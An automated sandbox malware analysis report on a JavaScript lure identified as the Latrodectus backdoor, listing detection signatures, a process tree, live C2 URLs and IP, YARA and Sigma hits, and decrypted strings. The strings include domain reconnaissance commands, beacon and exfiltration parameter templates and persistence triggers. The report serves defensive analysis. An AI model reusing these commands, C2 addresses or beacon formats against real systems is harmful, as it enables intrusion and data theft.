Edit tour

Windows Analysis Report
Document_a51_19i793302-14b09981a5569-3684u8.js

Overview

General Information

Sample name:	Document_a51_19i793302-14b09981a5569-3684u8.js
Analysis ID:	1432364
MD5:	b5c04c9ce0a3da2e16e97632e13b5e28
SHA1:	00303f1b540e92a79488fd9b603c5e987cee3734
SHA256:	71a429fdbaa04f8eee80c05b123ba00635569801ca041fdc7c6ac41de8aa72d3
Tags:	js
Infos:

Detection

Latrodectus

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected Latrodectus

C2 URLs / IPs found in malware configuration

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to detect sleep reduction / modifications

Drops executables to the windows directory (C:\Windows) and starts them

Performs a network lookup / discovery via net view

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample has a suspicious name (potential lure to open the executable)

Sample uses string decryption to hide its real strings

Sigma detected: WScript or CScript Dropper

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ipconfig to lookup or modify the Windows network settings

Uses net.exe to modify the status of services

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for available system drives (often done to infect USB drives)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops certificate files (DER)

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the current domain controller via net

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7500 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a51_19i793302-14b09981a5569-3684u8.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

msiexec.exe (PID: 7572 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7652 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding B0AF98778AC35F634802E620BDCA3C21 MD5: 9D09DC1EDA745A5F87553048E57620CF)

MSI181.tmp (PID: 7716 cmdline: "C:\Windows\Installer\MSI181.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq MD5: B9545ED17695A32FACE8C3408A6A3553)

rundll32.exe (PID: 7752 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7768 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 7784 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll", homq MD5: EF3179D498793BF4234F708D3BE28633)

cmd.exe (PID: 8472 cmdline: /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 8548 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)

cmd.exe (PID: 8576 cmdline: /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 4476 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

WmiPrvSE.exe (PID: 1312 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 7532 cmdline: /c nltest /domain_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nltest.exe (PID: 8320 cmdline: nltest /domain_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)

cmd.exe (PID: 6292 cmdline: /c nltest /domain_trusts /all_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nltest.exe (PID: 6348 cmdline: nltest /domain_trusts /all_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)

cmd.exe (PID: 8780 cmdline: /c net view /all /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 8828 cmdline: net view /all /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

cmd.exe (PID: 8888 cmdline: /c net view /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 4820 cmdline: net view /all MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

cmd.exe (PID: 2848 cmdline: /c net group "Domain Admins" /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 888 cmdline: net group "Domain Admins" /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 1820 cmdline: C:\Windows\system32\net1 group "Domain Admins" /domain MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

WMIC.exe (PID: 2252 cmdline: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3344 cmdline: /c net config workstation MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 2164 cmdline: net config workstation MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 9100 cmdline: C:\Windows\system32\net1 config workstation MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

cmd.exe (PID: 5916 cmdline: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 4176 cmdline: wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 928 cmdline: findstr /V /B /C:displayName MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 2260 cmdline: /c whoami /groups MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

rundll32.exe (PID: 7828 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll", homq MD5: EF3179D498793BF4234F708D3BE28633)

chrome.exe (PID: 7864 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7244 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1996,i,12555166688129216027,17064817212319626723,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://473750571567004317064230583514468350804565684324378075159610742091604698238217701484029465762430135913242023857750034401559054060945654540273638867228794983640833862748912121851334807031249099092790952130035074227943842970399582505875/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1952,i,10714614445797353568,16368385931931740060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Unidentified 111 (Latrodectus), Latrodectus	First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.	No Attribution	https://embee-research.ghost.io/phishing-domain-analysis-with-passive-dns-latrodectus/ https://exchange.xforce.ibmcloud.com/malware-analysis/guid:dab8a02f9161933bc2eff5ba4a5f8412 https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39 https://twitter.com/Myrtus0x0/status/1732997981866209550 https://www.embeeresearch.io/latrodectus-script-deobfuscation/	https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://jarinamaers.shop/live/", "https://startmast.shop/live/"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000003.2983475717.000001800FE30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000006.00000003.2790656279.000001800FA60000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000006.00000003.2738493222.000001800FE30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000006.00000003.2983528800.000001800FE30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000006.00000003.2934278162.000001800FE30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000006.00000003.3043571681.000001800FE30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000005.00000002.1683586362.00000235B4340000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000007.00000002.1715800687.000001EF532A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000006.00000003.2995791620.0000018010010000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000006.00000003.2856871010.000001800FA60000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000007.00000002.1715838763.000001EF532B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000006.00000003.2656498432.000001800FA60000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
Process Memory Space: rundll32.exe PID: 7784	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
decrypted.memstr	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
7.2.rundll32.exe.1ef532b0000.1.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
5.2.rundll32.exe.235b4340000.1.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
5.2.rundll32.exe.235b5ce0000.2.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
5.2.rundll32.exe.235b4340000.1.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
7.2.rundll32.exe.1ef532a0000.0.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
7.2.rundll32.exe.1ef532b0000.1.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
7.2.rundll32.exe.1ef532a0000.0.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
5.2.rundll32.exe.235b5ce0000.2.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a51_19i793302-14b09981a5569-3684u8.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a51_19i793302-14b09981a5569-3684u8.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a51_19i793302-14b09981a5569-3684u8.js", ProcessId: 7500, ProcessName: wscript.exe

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 146.19.106.236, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 7572, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732

Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net group "Domain Admins" /domain, CommandLine: net group "Domain Admins" /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net group "Domain Admins" /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2848, ParentProcessName: cmd.exe, ProcessCommandLine: net group "Domain Admins" /domain, ProcessId: 888, ProcessName: net.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a51_19i793302-14b09981a5569-3684u8.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a51_19i793302-14b09981a5569-3684u8.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a51_19i793302-14b09981a5569-3684u8.js", ProcessId: 7500, ProcessName: wscript.exe

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8780, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 8828, ProcessName: net.exe

Sigma detected: Share And Session Enumeration Using Net.EXE

Source: Process started

Author: Endgame, JHasenbusch (ported for oscd.community): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8780, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 8828, ProcessName: net.exe

Sigma detected: Suspicious Network Command

Source: Process started

Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: /c ipconfig /all, CommandLine: /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll", homq , ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7784, ParentProcessName: rundll32.exe, ProcessCommandLine: /c ipconfig /all, ProcessId: 8472, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 5.2.rundll32.exe.235b5ce0000.2.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://startmast.shop/live/"]}

Multi AV Scanner detection for dropped file

Source: :wtfbbq (copy)	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\sharepoint\360total.dll	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll	ReversingLabs: Detection: 18%

Multi AV Scanner detection for submitted file

Source: Document_a51_19i793302-14b09981a5569-3684u8.js

ReversingLabs: Detection: 18%

Sample uses string decryption to hide its real strings

Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: /c ipconfig /all
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: /c systeminfo
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: /c nltest /domain_trusts
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: /c net view /all /domain
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: /c net view /all
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &ipconfig=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: /c net config workstation
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: /c whoami /groups
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &systeminfo=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &domain_trusts=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &domain_trusts_all=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &net_view_all_domain=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &net_view_all=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &net_group=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &wmic=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &net_config_ws=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &net_wmic_av=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &whoami_group=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: "pid":
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: "%d",
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: "proc":
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: "%s",
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: "subproc": [
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &proclist=[
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: "pid":
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: "%d",
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: "proc":
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: "%s",
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: "subproc": [
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &desklinks=[
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: .
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: "%s"
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: Update_%x
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: Custom_update
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: .dll
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: .exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: Updater
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: "%s"
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: rundll32.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: "%s", %s %s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: runnung
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: :wtfbbq
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: %s%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: files/bp.dat
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: %s\%d.dll
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: %d.dat
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: %s\%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: init -zzzz="%s\%s"
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: front
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: /files/
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: Facial
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: !"$%&()*wp
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: .exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: POST
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: GET
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: curl/7.88.1
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: pN
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: URLS
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: COMMAND
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: ERROR
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: <html>
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: <!DOCTYPE
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: %s%d.dll
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: 12345
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &stiller=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: %s%d.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: LogonTrigger
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: %x%x
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: TimeTrigger
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: PT0H%02dM
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
